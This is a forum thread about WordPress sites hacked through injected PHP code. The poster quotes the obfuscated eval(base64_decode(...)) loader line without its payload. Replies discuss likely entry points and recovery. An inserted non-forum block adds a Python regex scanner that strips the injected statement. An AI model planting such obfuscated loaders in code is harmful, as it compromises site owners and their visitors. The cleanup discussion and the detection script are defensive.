Being Hacked F$$$KJ$K$JK

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
What the fuck, this goddamn mother fucker hacked multiple sites of mine. How the hell did they hack multiple sites and how the hell did my host let this happen? He installed this on almost all of my PHP files. I had my sites updated with the latest WordPress and had security plugins.

eval(base64_decode("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"));

I know this is going to take forever and I'm losing money. FUCK what do I do?
 

BlueTurtle

BANNED
Joined
Nov 30, 2011
Messages
699
Reaction score
1,318
Do you mean how do you get rid of this and get your sites back to normal or how do you prevent it happening again?
 

navero

Newbie
Joined
Jan 9, 2012
Messages
2
Reaction score
0
Lemme help you: type base64 decoder in Google, then go to hack forums, make a new account, check search for anything related to script kiddies :p. Problem solved.
 

BlueTurtle

BANNED
Joined
Nov 30, 2011
Messages
699
Reaction score
1,318
It's a Joomla hack.

Here's a fix:

http://www.kiveo.net/blog/joomla-osa-pl-code-injection/

Actually he seems to be attacking multiple holes, it could be one of many.

If it's wordpress you're using try this http://www.xphp.info/security/new-threat-pokosa-malware/
 

BlueTurtle

BANNED
Joined
Nov 30, 2011
Messages
699
Reaction score
1,318
Also, I'd recommend you study this and implement all of it http://codex.wordpress.org/Hardening_WordPress
 

GraveDigger00

Registered Member
Joined
Jul 24, 2011
Messages
88
Reaction score
9
It can also be injected into WordPress, I have had similar code on my sites. I had a horrible hosting company, and their shared servers overall were getting exploited and then my sites as well, multiple times. I moved my sites to new hosting, and it hasn't happened since, shocking... It could also be timthumb being exploited if a WordPress theme. Make sure to update all of your themes and plugins and versions, and change your passwords as well.
 

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
Thanks for all the replies, ya it's wordpress and I'm using different themes for sites that got hacked. It could be a plugin, I don't understand why the screen is white with a 0. It's not re-directing any traffic to anywhere so why did they hack my sites? Just to mess with people? I don't see a reason.
 

n3xus

Junior Member
Joined
Apr 19, 2009
Messages
121
Reaction score
32
Honestly, sometimes people pull this shit for the pure enjoyment of being a dick. Just like those bastards that make viruses just to fuck with people. It's sad that they use their intelligence for such purposes.
 

BlueTurtle

BANNED
Joined
Nov 30, 2011
Messages
699
Reaction score
1,318
> Thanks for all the replies, ya it's wordpress and I'm using different themes for sites that got hacked. It could be a plugin, I don't understand why the screen is white with a 0. It's not re-directing any traffic to anywhere so why did they hack my sites? Just to mess with people? I don't see a reason.

It's a pretty widespread attack so the site has probably been taken down now.

It was most likely something like a browser exploit to build a botnet or install adware/malware/crapware/cockware
 

phpbuilt

Elite Member
Joined
May 16, 2011
Messages
1,669
Reaction score
5,341
White screen with a 0 means your default wordpress template got deleted out of your wp database, or doesn't exist anymore ... to fix it just go into wordpress backend and select a theme (should fix it).

What was your host? Justhost is notorious for this. It could have gotten in through the host.

It might have gotten in through your templates. For instance, even if WordPress is fully up to date with all plugins ... it is possible that your WordPress theme (if it is an old one) would rely on something like timthumbs, which was exploited ... and you need a new copy of that template with a fixed timthumbs or you can always be hacked (just updating WordPress and plugins/widgets is not enough). Stay away from templates that are no longer supported.
 

phpbuilt

Elite Member
Joined
May 16, 2011
Messages
1,669
Reaction score
5,341
> and I'm using different themes for sites that got hacked

That theme could be using timthumbs. Timthumbs is something that many theme developers insert into their themes to help them automatically resize images (for instance, it will take the first image in your post and resize it to a thumbnail that can be stuck on your homepage with a description of the article).

http://blog.trendmicro.com/attacks-target-timthumb-vulnerability/ (article about timthumbs vulnerability).

If it is not timthumbs, it could be something similar. I would suggest that you switch off the templates that are giving you problems, or find updated versions of those same templates which are sure to be fixed.
 

macdonjo3

Jr. VIP
Joined
Nov 8, 2009
Messages
8,285
Reaction score
8,484
It happens. If you're with Hostwinds, just email them and they'll help you sort it out.
 

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
Well, it sounds like I'm screwed. I have iPage and they're saying that it's my problem and I need to re-install everything. I noticed that code is all over all the PHP files and in some it's 30 or 40 times. I backed up my databases and I have all my images. I know I have to sync up my database with my domain. So all my content should be in my database, right? I'm just not sure what is the best and least painful way of doing all this for 6 sites. Does the content just show up under the right permalinks? I'm just lost on what to do now or what to start with. FML, any help would be good.
 

resistancee

Registered Member
Joined
Jun 22, 2011
Messages
99
Reaction score
40
First clean your PC. Boot into safe mode, clean with Malwarebytes and ComboFix. Once you're clean, contact your host for FTP logs. Find out what he edited, remove the code he added or files he's added and install ESET NOD32!
 

PHustler

Jr. VIP
Joined
Feb 17, 2010
Messages
185
Reaction score
20
Let this be a warning to everyone.....BACKUP YOUR SITES!!!!
 

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
Ya, I made sure my PC was clean; I ran it with multiple tools like crazy. Not sure I can remove all the code, like I said it's in pretty much every PHP file 30 or 40 times. I'll check the FTP logs and check out ESET NOD32, thanks. I think it was an automated thing cuz other sites I have weren't affected.

And yes, back up your sites, databases and everything you can. This really sucks.

> First clean your PC. Boot into safe mode, clean with Malwarebytes and ComboFix. Once you're clean, contact your host for FTP logs. Find out what he edited, remove the code he added or files he's added and install ESET NOD32!
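
For the cleanup question raised above (the same statement repeated 30 or 40 times per PHP file), an added example that is not part of any post in this thread: a Python script that counts and strips the literal `eval(base64_decode("..."))` statement in a downloaded copy of a site. The function names, the `.cleaned` suffix and the sample tree are assumptions constructed for illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches the injected statement quoted in the thread: eval(base64_decode("..."));
INJECTED = re.compile(
    rb"""eval\s*\(\s*base64_decode\s*\(\s*(["'])[A-Za-z0-9+/=\s]*\1\s*\)\s*\)\s*;?"""
)

def strip_injection(data: bytes) -> tuple[bytes, int]:
    """Return (cleaned bytes, number of injected statements removed)."""
    return INJECTED.subn(b"", data)

def scan_tree(root: Path) -> dict[str, int]:
    """Map each infected .php file (path relative to root) to its hit count."""
    hits = {}
    for path in sorted(root.rglob("*.php")):
        count = sum(1 for _ in INJECTED.finditer(path.read_bytes()))
        if count:
            hits[path.relative_to(root).as_posix()] = count
    return hits

def clean_tree(root: Path) -> int:
    """Write <name>.cleaned beside each infected file; originals stay
    untouched as evidence. Returns the total number of statements removed."""
    total = 0
    for rel in scan_tree(root):
        src = root / rel
        cleaned, removed = strip_injection(src.read_bytes())
        src.with_name(src.name + ".cleaned").write_bytes(cleaned)
        total += removed
    return total

def demo() -> tuple[dict[str, int], int, bytes]:
    """Run the scan and cleanup on a constructed sample tree."""
    payload = base64.b64encode(b"echo 1;")  # harmless constructed payload
    bad = b'eval(base64_decode("' + payload + b'"));'
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "theme").mkdir()
        (root / "index.php").write_bytes(
            b"<?php " + bad + b"\necho 'hi';\n" + bad + b"\n")
        (root / "theme" / "ok.php").write_bytes(b"<?php echo 'clean'; ?>\n")
        hits, total = scan_tree(root), clean_tree(root)
        cleaned = (root / "index.php.cleaned").read_bytes()
    return hits, total, cleaned

if __name__ == "__main__":
    print(demo())
```

Run it against an offline copy rather than the live web root. It only matches this literal form, so differently obfuscated variants or extra files dropped by the attacker are not caught, and reinstalling core, themes and plugins from known-good sources remains the reliable fix.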
 

raven123

Regular Member
Joined
Jan 18, 2012
Messages
456
Reaction score
281
You should post your host here so people can safely move before something like this happens again. I hope like hell it isn't bluehost...

I usually use BackUpWordpress to counter these situations. I get my sites mailed to me several times every day. Take a note of this.
 

Dumper

Supreme Member
Joined
Mar 20, 2009
Messages
1,461
Reaction score
541
Yeah, every time I change something I back it up. If your host can't help you then there's not much else you can do other than move on and kick them fuckers to the curb. Get hostgator...
 

ibmethatswhoib

Elite Member
Joined
Feb 17, 2011
Messages
1,568
Reaction score
1,170
Website
www.youtube.com
I have iPage and they SUCK, don't use them. They're slow to start, customer service sucks and they haven't helped at all. I have db backup that sends me emails too and have all my latest ones. I'm just not sure, do I just erase everything in the FTP folders, re-install WordPress and then I should be good? This is a dumb question but do databases contain all your posts and images? I guess I'm just not sure what I should delete, overwrite and everything.
 